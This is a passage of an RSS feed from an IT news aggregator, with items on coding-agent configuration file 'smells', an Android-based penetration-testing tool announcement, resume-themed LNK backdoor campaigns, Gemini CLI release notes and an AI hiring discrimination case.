- Verbreitung von Open Source in kommerziellen Codebasen: https://www.intel.com/content/www/us/en/developer/articles/guide/the-careful-consumption-of-open-source-software.html<br />
<br />
- Linux-Guides Merch*: https://linux-guides.myspreadshop.de/<br />
- Professioneller Linux Support*: https://www.linuxguides.de/linux-support/<br />
- Linux-Arbeitsplatz für KMU & Einzelpersonen*: https://www.linuxguides.de/linux-arbeitsplatz/<br />
- Linux Mint Kurs für Anwender*: https://www.linuxguides.de/kurs-linux-mint-fur-anwender/<br />
- Offizielle Webseite: https://www.linuxguides.de<br />
- Forum: https://forum.linuxguides.de/<br />
- Unterstützen: http://unterstuetzen.linuxguides.de<br />
- Mastodon: https://mastodon.social/@LinuxGuides<br />
- X: https://twitter.com/LinuxGuides<br />
- Instagram: https://www.instagram.com/linuxguides/<br />
- Kontakt: https://www.linuxguides.de/kontakt/<br />
<br />
Inhaltsverzeichnis:<br />
-------------------------------------<br />
00:00 Ehrenamt ist wichtig<br />
01:15 Was bedeutet Open Source Software?<br />
03:25 Zur Petition<br />
05:50 Digitale Souveränität für alle<br />
09:08 Verabschiedung<br />
<br />
Haftungsausschluss:<br />
-------------------------------------<br />
Das Video dient lediglich zu Informationszwecken. Wir übernehmen keinerlei Haftung für in diesem Video gezeigte und / oder erklärte Handlungen. Es entsteht in keinem Moment Anspruch auf Schadensersatz oder ähnliches.<br />
<br />
*) Werbung<br />
<br />
#linuxguides #petition #opensource #ehrenamt<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 5 Best Online C Programming Courses for 2026]]></title>
<description><![CDATA[Learning to program in C on an online platform can provide structured learning and a certification to show along with your resume.
The post The 5 Best Online C Programming Courses for 2026 appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3610125/it-nachrichten/the-5-best-online-c-programming-courses-for-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610125/it-nachrichten/the-5-best-online-c-programming-courses-for-2026/</guid>
<pubDate>Fri, 19 Jun 2026 13:03:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Learning to program in C on an online platform can provide structured learning and a certification to show along with your resume.</p>
<p>The post <a href="https://www.techrepublic.com/article/best-c-programming-courses/">The 5 Best Online C Programming Courses for 2026</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding agents may be getting bad instructions from ‘smelly’ config files]]></title>
<description><![CDATA[AI coding agents are becoming critical to software development, but the configuration files that guide them, such as Agents.md or Claude.md, can be “smelly.”



That means they can contain structural flaws, redundancies, or counterproductive workflows that bloat context, waste tokens, and make co...]]></description>
<link>https://tsecurity.de/de/3609268/ai-nachrichten/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609268/ai-nachrichten/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files/</guid>
<pubDate>Fri, 19 Jun 2026 04:18:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI coding agents are becoming critical to software development, but the configuration files that guide them, such as Agents.md or Claude.md, can be “smelly.”</p>



<p>That means they can contain structural flaws, redundancies, or counterproductive workflows that bloat context, waste tokens, and make coding agents less reliable.</p>



<p>Researchers from the Department of Computer Science at Brazil’s Federal University of Minas Gerais hope to shed light on this problem, presenting what they call the “first catalog of smells” for coding agent configuration files. The most odorous? Lint and skill leakage, context bloat, and conflicting instructions.</p>



<p>“Our results show that these smells are widespread in practice,” the <a href="https://arxiv.org/pdf/2606.15828" target="_blank" rel="noreferrer noopener">researchers wrote</a>. Consequently, they “may directly influence how coding agents interpret project conventions, prioritize instructions, and perform development tasks.”</p>



<h2 class="wp-block-heading">Smelly configs in the harness make models misbehave</h2>



<p>Agents like Claude Code, Codex, Cursor, and Gemini are increasingly taking over software engineering tasks like <a href="https://www.infoworld.com/article/4141358/the-ai-coding-hangover.html" target="_blank">code generation</a> and review, test creation, bug fixing, software migration, and documentation writing.</p>



<p>Essentially, they are a combination of a large language model (LLM) and a harness; the model is the brain, the harness provides a loop that executes actions and allows agents to call the tools they need to fulfill a task. These might include web search engines, issue-tracking platforms, and test runners.</p>



<p>Agents’ behavior is guided by config files such as Agents.md and Claude.md, which provide instructions around project workflows, testing requirements, and domain-specific knowledge. This helps maintain consistency across separate tasks and sessions. Typically, these config files are loaded at the start of a session as part of a prompt and are maintained throughout the task.</p>



<p>But the researchers found that these configurations are riddled with smells; 91 of 100 popular open-source repositories containing Agent.md or Claude.md files had at least one smell.</p>



<p>The six strongest odors:</p>



<ul class="wp-block-list">
<li>Lint leakage (appearing in 62% of files)</li>



<li>Context bloat (42%)</li>



<li>Skill leakage (35%)</li>



<li>Conflicting instructions (28%)</li>



<li>Init fossilization (24%)</li>



<li>Blind reference (16%)</li>
</ul>



<h2 class="wp-block-heading">The scent of waste</h2>



<p><strong>Lint leakage</strong> occurs when instructions in config files needlessly include rules that are already enforced by analysis tools like code formatters or linters (which filter out bugs, security vulnerabilities, inconsistencies, and programmatic errors, by, for example, restating generic style guide recommendations, formatting rules, line length, naming conventions, or import ordering).</p>



<p>This repetition increases a model’s context size and wastes tokens, the researchers pointed out. It “can divert the model from focusing on more important project-specific concerns, such as architectural constraints, domain rules, or safety policies.”</p>



<p><strong>Context bloat</strong> means that configurations are excessively large and overloaded with rules, examples, or details that are unnecessary or low priority. This drives up token usage, ultimately raising costs and distracting the model from higher priority instructions.</p>



<p>With <strong>skill leakage</strong>, rarely-used or task-specific instructions are unnecessarily included in the configuration, rather than in separate dedicated skill or task files. This specialized knowledge is dragged into every session, even when the model doesn’t need it to perform its task. Thus, the context window becomes larger, more expensive, and difficult to maintain, the researchers noted.</p>



<p>“Furthermore, such rules may compete for attention with the rules that are actually critical for the project,” they wrote.</p>



<p>Just as it sounds, <strong>conflicting instructions</strong> means that file rules contradict one another, leading to ambiguity; the model essentially gets “confused” and has to choose arbitrarily. This can lead to inconsistency and unstable results.</p>



<p><strong>Init fossilization</strong> occurs when files are generated once but never reviewed or edited again, so they include stale or irrelevant rules because they don’t reflect changes in the <a href="https://www.infoworld.com/article/4182518/shipping-enterprise-quality-code-with-ai-agents.html" target="_blank">codebase</a>. “As a result, the configuration tends to accumulate noise, increase context consumption, and reduce the overall effectiveness of the agent over time,” the researchers explained.</p>



<p>Finally, <strong>blind references</strong> point to files or docs without explaining what they’re for. Consequently, the <a href="https://www.infoworld.com/article/4154570/best-practices-for-building-agentic-systems.html" target="_blank">agent</a> might simply ignore them, leading to problems if they’re critical to a task, load unnecessary materials to gather context, taking up tokens and space, or fail to prioritize important information.</p>



<p>Additionally, the researchers discovered that smells often co-occur in the same file and trigger the appearance of others; for instance, skill leaking and conflicting instructions can increase the likelihood of context bloat by 83% because they add extemporaneous or irrelevant information.</p>



<h2 class="wp-block-heading">How to air out smells</h2>



<p>While these smells are “widespread in practice,” there are ways to air them out.</p>



<p>For example, to reduce lint leakage, stylistic constraints such as formatting, and import ordering should be removed from prompts. Let programmatic tools handle them; spending budget on style rules is a waste, the researchers noted.</p>



<p>To cut down on context bloat, Claude.md and Agents.md files should remain concise and provide project-specific guidance. For instance, Anthropic recommends a target of fewer than 200 lines per Claude.md file.</p>



<p>To limit skill leakage, developers should provide specific instructions in config files about the project build, test running, code conventions, and other important context. Task-specific instructions should be kept in separate markdown files with descriptive names, the researchers advise.</p>



<p>Additionally, to avoid conflicting instructions, builders should periodically review config files to remove instructions that are contradictory or outdated. Similarly, reducing init fossilization requires continuous updating of files, the researchers explained. This is particularly important in cases where an agent makes the same mistake twice in a row, a code review reveals a detail the agent should have already known, or when developers find themselves prompting corrections and clarifications already addressed in a previous session.</p>



<p>Finally, to minimize blind references, developers should tell <a href="https://www.infoworld.com/article/4112542/how-to-make-ai-agents-reliable.html" target="_blank">agents</a> when and why to read files, and include references with concise explanations of the document’s role, the information it contains, and scenarios where it should be used. For instance, text may reference an external dependency, include a link to its GitHub repository, and provide a brief explanation of its purpose. “Then the agent is able to understand the role of the dependency without needing to load or inspect the external repository directly,” the researchers explained.</p>



<p>Ultimately, they concluded, configuration files are “key artifacts” in agentic software development, and when they get smelly, there’s a problem. Therefore, “their quality deserves effort and attention.”</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding agents may be getting bad instructions from ‘smelly’ config files]]></title>
<description><![CDATA[AI coding agents are becoming critical to software development, but the configuration files that guide them, such as Agents.md or Claude.md, can be “smelly.”



That means they can contain structural flaws, redundancies, or counterproductive workflows that bloat context, waste tokens, and make co...]]></description>
<link>https://tsecurity.de/de/3609265/it-nachrichten/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609265/it-nachrichten/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files/</guid>
<pubDate>Fri, 19 Jun 2026 04:18:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI coding agents are becoming critical to software development, but the configuration files that guide them, such as Agents.md or Claude.md, can be “smelly.”</p>



<p>That means they can contain structural flaws, redundancies, or counterproductive workflows that bloat context, waste tokens, and make coding agents less reliable.</p>



<p>Researchers from the Department of Computer Science at Brazil’s Federal University of Minas Gerais hope to shed light on this problem, presenting what they call the “first catalog of smells” for coding agent configuration files. The most odorous? Lint and skill leakage, context bloat, and conflicting instructions.</p>



<p>“Our results show that these smells are widespread in practice,” the <a href="https://arxiv.org/pdf/2606.15828" target="_blank" rel="nofollow">researchers wrote</a>. Consequently, they “may directly influence how coding agents interpret project conventions, prioritize instructions, and perform development tasks.”</p>



<h2 class="wp-block-heading">Smelly configs in the harness make models misbehave</h2>



<p>Agents like Claude Code, Codex, Cursor, and Gemini are increasingly taking over software engineering tasks like <a href="https://www.infoworld.com/article/4141358/the-ai-coding-hangover.html" target="_blank">code generation</a> and review, test creation, bug fixing, software migration, and documentation writing.</p>



<p>Essentially, they are a combination of a large language model (LLM) and a harness; the model is the brain, the harness provides a loop that executes actions and allows agents to call the tools they need to fulfill a task. These might include web search engines, issue-tracking platforms, and test runners.</p>



<p>Agents’ behavior is guided by config files such as Agents.md and Claude.md, which provide instructions around project workflows, testing requirements, and domain-specific knowledge. This helps maintain consistency across separate tasks and sessions. Typically, these config files are loaded at the start of a session as part of a prompt and are maintained throughout the task.</p>



<p>But the researchers found that these configurations are riddled with smells; 91 of 100 popular open-source repositories containing Agent.md or Claude.md files had at least one smell.</p>



<p>The six strongest odors:</p>



<ul class="wp-block-list">
<li>Lint leakage (appearing in 62% of files)</li>



<li>Context bloat (42%)</li>



<li>Skill leakage (35%)</li>



<li>Conflicting instructions (28%)</li>



<li>Init fossilization (24%)</li>



<li>Blind reference (16%)</li>
</ul>



<h2 class="wp-block-heading">The scent of waste</h2>



<p><strong>Lint leakage</strong> occurs when instructions in config files needlessly include rules that are already enforced by analysis tools like code formatters or linters (which filter out bugs, security vulnerabilities, inconsistencies, and programmatic errors, by, for example, restating generic style guide recommendations, formatting rules, line length, naming conventions, or import ordering).</p>



<p>This repetition increases a model’s context size and wastes tokens, the researchers pointed out. It “can divert the model from focusing on more important project-specific concerns, such as architectural constraints, domain rules, or safety policies.”</p>



<p><strong>Context bloat</strong> means that configurations are excessively large and overloaded with rules, examples, or details that are unnecessary or low priority. This drives up token usage, ultimately raising costs and distracting the model from higher priority instructions.</p>



<p>With <strong>skill leakage</strong>, rarely-used or task-specific instructions are unnecessarily included in the configuration, rather than in separate dedicated skill or task files. This specialized knowledge is dragged into every session, even when the model doesn’t need it to perform its task. Thus, the context window becomes larger, more expensive, and difficult to maintain, the researchers noted.</p>



<p>“Furthermore, such rules may compete for attention with the rules that are actually critical for the project,” they wrote.</p>



<p>Just as it sounds, <strong>conflicting instructions</strong> means that file rules contradict one another, leading to ambiguity; the model essentially gets “confused” and has to choose arbitrarily. This can lead to inconsistency and unstable results.</p>



<p><strong>Init fossilization</strong> occurs when files are generated once but never reviewed or edited again, so they include stale or irrelevant rules because they don’t reflect changes in the <a href="https://www.infoworld.com/article/4182518/shipping-enterprise-quality-code-with-ai-agents.html" target="_blank">codebase</a>. “As a result, the configuration tends to accumulate noise, increase context consumption, and reduce the overall effectiveness of the agent over time,” the researchers explained.</p>



<p>Finally, <strong>blind references</strong> point to files or docs without explaining what they’re for. Consequently, the <a href="https://www.infoworld.com/article/4154570/best-practices-for-building-agentic-systems.html" target="_blank">agent</a> might simply ignore them, leading to problems if they’re critical to a task, load unnecessary materials to gather context, taking up tokens and space, or fail to prioritize important information.</p>



<p>Additionally, the researchers discovered that smells often co-occur in the same file and trigger the appearance of others; for instance, skill leaking and conflicting instructions can increase the likelihood of context bloat by 83% because they add extemporaneous or irrelevant information.</p>



<h2 class="wp-block-heading">How to air out smells</h2>



<p>While these smells are “widespread in practice,” there are ways to air them out.</p>



<p>For example, to reduce lint leakage, stylistic constraints such as formatting, and import ordering should be removed from prompts. Let programmatic tools handle them; spending budget on style rules is a waste, the researchers noted.</p>



<p>To cut down on context bloat, Claude.md and Agents.md files should remain concise and provide project-specific guidance. For instance, Anthropic recommends a target of fewer than 200 lines per Claude.md file.</p>



<p>To limit skill leakage, developers should provide specific instructions in config files about the project build, test running, code conventions, and other important context. Task-specific instructions should be kept in separate markdown files with descriptive names, the researchers advise.</p>



<p>Additionally, to avoid conflicting instructions, builders should periodically review config files to remove instructions that are contradictory or outdated. Similarly, reducing init fossilization requires continuous updating of files, the researchers explained. This is particularly important in cases where an agent makes the same mistake twice in a row, a code review reveals a detail the agent should have already known, or when developers find themselves prompting corrections and clarifications already addressed in a previous session.</p>



<p>Finally, to minimize blind references, developers should tell <a href="https://www.infoworld.com/article/4112542/how-to-make-ai-agents-reliable.html" target="_blank">agents</a> when and why to read files, and include references with concise explanations of the document’s role, the information it contains, and scenarios where it should be used. For instance, text may reference an external dependency, include a link to its GitHub repository, and provide a brief explanation of its purpose. “Then the agent is able to understand the role of the dependency without needing to load or inspect the external repository directly,” the researchers explained.</p>



<p>Ultimately, they concluded, configuration files are “key artifacts” in agentic software development, and when they get smelly, there’s a problem. Therefore, “their quality deserves effort and attention.”</p>



<p><em>This article originally appeared on <a href="https://www.infoworld.com/article/4187057/ai-coding-agents-may-be-getting-bad-instructions-from-smelly-config-files.html" target="_blank">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I built an opensource tool that turns rooted Androids into physical exploit platforms HID, DuckyScript, C2]]></title>
<description><![CDATA[Hey fam. I got sick of carrying dedicated microcontrollers for proximity engagements, so I built chimera.  ​ It interacts directly with the Android kernel to HID keyboards, mount virtual flash drives, and drop payloads natively from the phone.  ​ I’d love for you to test it on your setups and giv...]]></description>
<link>https://tsecurity.de/de/3609229/malware-trojaner-viren/i-built-an-opensource-tool-that-turns-rooted-androids-into-physical-exploit-platforms-hid-duckyscript-c2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609229/malware-trojaner-viren/i-built-an-opensource-tool-that-turns-rooted-androids-into-physical-exploit-platforms-hid-duckyscript-c2/</guid>
<pubDate>Fri, 19 Jun 2026 04:03:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey fam. I got sick of carrying dedicated microcontrollers for proximity engagements, so I built chimera. </p> <p>​</p> <p>It interacts directly with the Android kernel to HID keyboards, mount virtual flash drives, and drop payloads natively from the phone. </p> <p>​</p> <p>I’d love for you to test it on your setups and give me some brutal feedback pls.</p> <p>​</p> <p>Repo: <a href="https://github.com/cipher-attack/Chimera">https://github.com/cipher-attack/Chimera</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Ok_Rhubarb_6783"> /u/Ok_Rhubarb_6783 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1u8lp3h/i_built_an_opensource_tool_that_turns_rooted/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1u8lp3h/i_built_an_opensource_tool_that_turns_rooted/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Abuse PowerShell, VBScript, and BAT Files to Deliver Xctdoor Backdoor]]></title>
<description><![CDATA[A new wave of cyberattacks is targeting corporate employees through files that look exactly like legitimate job documents. Hackers are distributing malicious LNK files disguised as resumes, and the moment a victim opens one, the infection quietly begins. The attack is sophisticated enough to fool...]]></description>
<link>https://tsecurity.de/de/3607276/it-security-nachrichten/hackers-abuse-powershell-vbscript-and-bat-files-to-deliver-xctdoor-backdoor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607276/it-security-nachrichten/hackers-abuse-powershell-vbscript-and-bat-files-to-deliver-xctdoor-backdoor/</guid>
<pubDate>Thu, 18 Jun 2026 11:52:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new wave of cyberattacks is targeting corporate employees through files that look exactly like legitimate job documents. Hackers are distributing malicious LNK files disguised as resumes, and the moment a victim opens one, the infection quietly begins. The attack is sophisticated enough to fool cautious users, since the file shows a believable resume while […]</p>
<p>The post <a href="https://cybersecuritynews.com/hackers-abuse-powershell-deliver-xctdoor-backdoor/">Hackers Abuse PowerShell, VBScript, and BAT Files to Deliver Xctdoor Backdoor</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Resume-Themed LNK Files to Deploy Xctdoor Backdoor via DLL Side Loading]]></title>
<description><![CDATA[Cybersecurity researchers have uncovered a new malware campaign targeting corporate environments using resume-themed LNK shortcut files. Threat actors are disguising malicious shortcuts as job applications, specifically customizing the file names to include the targeted company’s name and a relev...]]></description>
<link>https://tsecurity.de/de/3606928/it-security-nachrichten/hackers-use-resume-themed-lnk-files-to-deploy-xctdoor-backdoor-via-dll-side-loading/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606928/it-security-nachrichten/hackers-use-resume-themed-lnk-files-to-deploy-xctdoor-backdoor-via-dll-side-loading/</guid>
<pubDate>Thu, 18 Jun 2026 09:23:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Cybersecurity researchers have uncovered a new malware campaign targeting corporate environments using resume-themed LNK shortcut files. Threat actors are disguising malicious shortcuts as job applications, specifically customizing the file names to include the targeted company’s name and a relevant job title. When an unsuspecting employee opens the file, it displays a legitimate-looking decoy resume while […]</p>
<p>The post <a href="https://cyberpress.org/resume-lures-deliver-xctdoor/">Hackers Use Resume-Themed LNK Files to Deploy Xctdoor Backdoor via DLL Side Loading</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious LNK Files Disguised as Job Resumes Target Corporate Employees]]></title>
<description><![CDATA[Malicious LNK files masquerading as job resumes are being used in targeted campaigns against corporate employees, combining social engineering with multi-stage malware delivery to achieve stealthy persistence and remote access. Attackers craft filenames that include company names and job titles f...]]></description>
<link>https://tsecurity.de/de/3606762/it-security-nachrichten/malicious-lnk-files-disguised-as-job-resumes-target-corporate-employees/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606762/it-security-nachrichten/malicious-lnk-files-disguised-as-job-resumes-target-corporate-employees/</guid>
<pubDate>Thu, 18 Jun 2026 08:07:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Malicious LNK files masquerading as job resumes are being used in targeted campaigns against corporate employees, combining social engineering with multi-stage malware delivery to achieve stealthy persistence and remote access. Attackers craft filenames that include company names and job titles for example, (RESUME)Domestic Company Name_Job Title***.LNK and embed a genuine-looking decoy document inside the shortcut. […]</p>
<p>The post <a href="https://gbhackers.com/lnk-files-disguised-as-job-resumes/">Malicious LNK Files Disguised as Job Resumes Target Corporate Employees</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.47.0]]></title>
<description><![CDATA[What's Changed

chore(release): bump version to 0.47.0-nightly.20260602.gcfcecebe8 by @gemini-cli-robot in #27644
Changelog for v0.46.0-preview.0 by @gemini-cli-robot in #27641
Respect backend definitions for 3.5 flash and Update auto mode to use 3.5 flash when the flag is enabled. by @DavidAPier...]]></description>
<link>https://tsecurity.de/de/3606497/downloads/release-v0470/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606497/downloads/release-v0470/</guid>
<pubDate>Thu, 18 Jun 2026 04:16:55 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>chore(release): bump version to 0.47.0-nightly.20260602.gcfcecebe8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576411191" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27644" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27644/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27644">#27644</a></li>
<li>Changelog for v0.46.0-preview.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4575998996" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27641" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27641/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27641">#27641</a></li>
<li>Respect backend definitions for 3.5 flash and Update auto mode to use 3.5 flash when the flag is enabled. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576413853" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27645" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27645/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27645">#27645</a></li>
<li>fix(policy): add EBUSY fallback and TOML parse recovery (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3974849904" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/19919" data-hovercard-type="issue" data-hovercard-url="/google-gemini/gemini-cli/issues/19919/hovercard" href="https://github.com/google-gemini/gemini-cli/issues/19919">#19919</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/krishdef7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/krishdef7">@krishdef7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037596973" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/21541" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/21541/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/21541">#21541</a></li>
<li>Changelog for v0.45.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576083495" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27642" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27642/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27642">#27642</a></li>
<li>update the max amount of times the Antigravity transition banner can be displayed. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4593177287" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27676" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27676/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27676">#27676</a></li>
<li>chore: remove experimental text from browser agent docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gsquared94/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gsquared94">@gsquared94</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614247385" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27746" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27746/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27746">#27746</a></li>
<li>fix(core): implement atomic update in MCP tool discovery by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565539001" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27619" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27619/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27619">#27619</a></li>
<li>Vertex ai model mapping fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616892781" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27749" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27749/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27749">#27749</a></li>
<li>Add documentation and migration commands for Antigravity CLI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DavidAPierce/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DavidAPierce">@DavidAPierce</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625182215" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27765" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27765/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27765">#27765</a></li>
<li>Avoid persisting empty resume sessions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SandyTao520/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SandyTao520">@SandyTao520</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625604569" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27770" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27770/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27770">#27770</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.46.0...v0.47.0"><tt>v0.46.0...v0.47.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Judge signals AI recruitment tool vendors like Workday may not escape liability for discrimination]]></title>
<description><![CDATA[A federal judge has rebuffed Workday’s claim that it cannot be held liable under California anti-discrimination laws when its tools are used to screen (and potentially reject) job candidates in other states.



This week, US District Judge Rita Lin indicated that she will likely allow additional ...]]></description>
<link>https://tsecurity.de/de/3606463/ai-nachrichten/judge-signals-ai-recruitment-tool-vendors-like-workday-may-not-escape-liability-for-discrimination/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606463/ai-nachrichten/judge-signals-ai-recruitment-tool-vendors-like-workday-may-not-escape-liability-for-discrimination/</guid>
<pubDate>Thu, 18 Jun 2026 03:34:18 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A federal judge has rebuffed Workday’s claim that it cannot be held liable under California anti-discrimination laws when its tools are used to screen (and potentially reject) job candidates in other states.</p>



